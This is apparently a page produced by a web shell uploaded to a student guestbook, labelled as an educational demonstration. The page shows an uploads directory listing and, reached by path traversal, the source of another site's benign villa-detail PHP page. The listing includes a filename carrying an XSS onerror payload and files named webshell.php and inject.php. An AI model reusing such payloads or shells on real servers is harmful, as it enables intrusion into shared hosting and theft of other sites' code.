
Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../586648.klas4s23.mid-ica.nl/public_html/VillaVerkenner/VillaInfo.php

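<?php
include 'includes/header.php';
include 'includes/databaseConn.php';

$db = new Database();
$conn = $db->getConnection();

// The villa id comes from the query string. Anything that does not cast to a
// positive integer is treated as "no villa selected" and the page stops here.
$id = (int) ($_GET['id'] ?? 0);
if ($id <= 0) {
    echo "<p style='text-align:center; margin-top:50px;'>Geen villa geselecteerd.</p>";
    include 'includes/footer.php';
    exit;
}

/**
 * Prepare and run a query that takes the current villa id as the :id placeholder.
 * The id is always bound as an integer parameter, never interpolated into SQL.
 *
 * @param string $sql query text containing exactly one :id placeholder
 */
$queryForVilla = static function (string $sql) use ($conn, $id): PDOStatement {
    $stmt = $conn->prepare($sql);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt;
};

// Only published villas are shown; an unpublished or unknown id reads as "not found".
$villa = $queryForVilla(
    "SELECT * FROM villas WHERE villa_id = :id AND is_gepubliceerd = 1 LIMIT 1"
)->fetch(PDO::FETCH_ASSOC);

// fetch() returns false when no row matches. Without this guard the template
// below would index into false (warnings, an empty/partial page).
if ($villa === false) {
    echo "<p style='text-align:center; margin-top:50px;'>Villa niet gevonden.</p>";
    include 'includes/footer.php';
    exit;
}

// Fetch eigenschappen
$eigenschappen = $queryForVilla("
    SELECT e.naam 
    FROM eigenschappen e
    INNER JOIN villa_eigenschappen ve ON e.eigenschap_id = ve.eigenschap_id
    WHERE ve.villa_id = :id
")->fetchAll(PDO::FETCH_COLUMN);

// Fetch ligging tags (column is 'naam', not 'tag_naam')
$liggingTags = $queryForVilla("
    SELECT lt.naam 
    FROM ligging_tags lt
    INNER JOIN villa_ligging_tags vlt ON lt.tag_id = vlt.tag_id
    WHERE vlt.villa_id = :id
")->fetchAll(PDO::FETCH_COLUMN);

// Fetch hoofdafbeelding (main photo)
$fotoHoofd = $queryForVilla(
    "SELECT bestandspad FROM fotos WHERE villa_id = :id AND is_hoofdfoto = 1 LIMIT 1"
)->fetch(PDO::FETCH_ASSOC);

// Fetch overige foto's (other photos)
$fotoOverig = $queryForVilla(
    "SELECT bestandspad FROM fotos WHERE villa_id = :id AND is_hoofdfoto = 0 LIMIT 4"
)->fetchAll(PDO::FETCH_ASSOC);

// Prepare image list: slot 0 is the main photo (or a placeholder), slots 1-4
// are the other photos, padded with placeholders below.
// Paths are used exactly as stored. The earlier "ensure path starts with /"
// step compared against an empty string and therefore never changed anything;
// it was removed rather than silently start rewriting stored paths.
$images = [];

if (!empty($fotoHoofd['bestandspad'])) {
    $images[] = $fotoHoofd['bestandspad'];
} else {
    $images[] = 'images/villa.png';
}

foreach ($fotoOverig as $foto) {
    if (!empty($foto['bestandspad'])) {
        $images[] = $foto['bestandspad'];
    }
}

// Fill remaining gallery slots with placeholders if less than 5 images
while (count($images) < 5) {
    $images[] = 'images/interieur.png';
}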




?>

<!DOCTYPE html>
<html lang="nl">

<head>
    <!-- Page head: the title is built from the villa row loaded at the top of this
         script; it assumes $villa is an array (a matched, published villa), not false. -->
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title><?php echo htmlspecialchars($villa['titel']); ?> - Villa Verkenner</title>
    <link rel="stylesheet" href="css/style.css">
    <style>
        .villa-container {
            max-width: 1200px;
            margin: 40px auto;
            background: #fff;
            box-shadow: 0 0 12px rgba(0, 0, 0, 0.1);
            border-radius: 12px;
            overflow: hidden;
        }

        .villa-images {
            display: grid;
            grid-template-columns: 2fr 1fr;
            gap: 10px;
        }

        .villa-images img {
            width: 100%;
            height: 100%;
            object-fit: cover;
            border-radius: 8px;
        }

        .villa-gallery {
            display: grid;
            grid-template-columns: repeat(2, 1fr);
            gap: 10px;
        }

        .villa-gallery img {
            width: 100%;
            height: 100%;
            object-fit: cover;
            border-radius: 8px;
        }

        .villa-content {
            padding: 20px;
            color: black;
            display: flex;
            flex-direction: row;
        }

        .villa-description {
            margin-bottom: 25px;
            line-height: 1.6;
        }

        .villa-info {
            flex-direction: column;
            width: 65%;
            background-color: #C8D9E8;
            border-radius: 20px;
            padding: 20px;
        }

        .villa-details {
            background: #C8D9E8;
            color: black;
            padding: 15px 20px;
            border-radius: 20px;
            width: 30%;
            margin-left: auto;
        }

        .villa-details ul {
            list-style: none;
            padding: 0;
        }

        .villa-details li {
            padding: 6px 0;
            border-bottom: 1px solid #e1e1e1;
        }

        .villa-details li:last-child {
            border-bottom: none;
        }

        .btn {
            display: inline-block;
            color: #fff;
            text-decoration: none;
            padding: 10px 18px;
            border-radius: 6px;
            margin-top: 20px;
            transition: background 0.3s;
        }

        .back-btn {
            background-color: #0072c6;
        }

        .back-btn:hover {
            background-color: #005b9a;
        }

        .pdf-btn {
            background-color: #00b67a;
        }

        .pdf-btn:hover {
            background-color: #009a64;
        }

        /* Tablet: stack the main photo above the gallery. */
        @media (max-width: 768px) {
            .villa-images {
                grid-template-columns: 1fr;
            }

            .villa-gallery {
                grid-template-columns: repeat(2, 1fr);
            }

            .villa-container {
                margin: 20px;
            }
        }

        /* Phone: info and details panels become full-width rows. */
        @media (max-width: 480px) {
            .villa-content {
                flex-direction: column;
            }

            .villa-info,
            .villa-details {
                width: 100%;
                margin: 0 0 20px 0;
            }
        }
    </style>
</head>

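<body>

    <div class="villa-container">
        <!-- $images always holds 5 entries (real paths or placeholders), see the PHP above. -->
        <div class="villa-images">
            <img src="<?php echo htmlspecialchars($images[0]); ?>" alt="Hoofdafbeelding van villa">
            <div class="villa-gallery">
                <img src="<?php echo htmlspecialchars($images[1]); ?>" alt="Villa foto">
                <img src="<?php echo htmlspecialchars($images[2]); ?>" alt="Villa foto">
                <img src="<?php echo htmlspecialchars($images[3]); ?>" alt="Villa foto">
                <img src="<?php echo htmlspecialchars($images[4]); ?>" alt="Villa foto">
            </div>
        </div>

        <div class="villa-content">
            <div class="villa-info">
                <h2><?php echo htmlspecialchars($villa['titel']); ?></h2>
                <p><em><?php echo htmlspecialchars($villa['plaats']); ?></em></p>

                <div class="villa-description">
                    <!-- Escape first, then convert newlines, so nl2br's <br> tags survive. -->
                    <p><?php echo nl2br(htmlspecialchars($villa['omschrijving'] ?? '')); ?></p>
                </div>
            </div>
            <div class="villa-details">
                <ul>
                    <li><strong>Adres:</strong> <?php echo htmlspecialchars($villa['adres']); ?></li>
                    <li><strong>Plaats:</strong> <?php echo htmlspecialchars($villa['plaats']); ?></li>
                    <li><strong>Capaciteit:</strong> <?php echo htmlspecialchars($villa['capaciteit']); ?> personen</li>
                    <li><strong>Slaapkamers:</strong> <?php echo htmlspecialchars($villa['slaapkamers']); ?></li>
                    <li><strong>Badkamers:</strong> <?php echo htmlspecialchars($villa['badkamers']); ?></li>
                    <?php if (!empty($liggingTags)): ?>
                        <li><strong>Ligging:</strong> <?php echo htmlspecialchars(implode(', ', $liggingTags)); ?></li>
                    <?php endif; ?>
                    <?php if (!empty($eigenschappen)): ?>
                        <li><strong>Eigenschappen:</strong> <?php echo htmlspecialchars(implode(', ', $eigenschappen)); ?></li>
                    <?php endif; ?>
                    <!-- Cast to float: number_format() rejects/deprecates a null price. -->
                    <li><strong>Prijs per nacht:</strong> €<?php echo number_format((float) $villa['prijs_per_nacht'], 2, ',', '.'); ?></li>
                </ul>

                <a href="VillaPage.php" class="btn back-btn">← Terug naar overzicht</a>
                <!-- The id is cast to int so only a numeric value ever lands in the URL;
                     it is the one value on this page that was echoed unescaped. -->
                <a href="generateVillaPDF.php?id=<?php echo (int) $villa['villa_id']; ?>" class="btn pdf-btn">📄 Download Flyer</a>
            </div>
        </div>
    </div>

    <?php include 'includes/footer.php'; ?>
</body>

</html>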

⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, a shell like this allows complete compromise of the server and of every site hosted on it.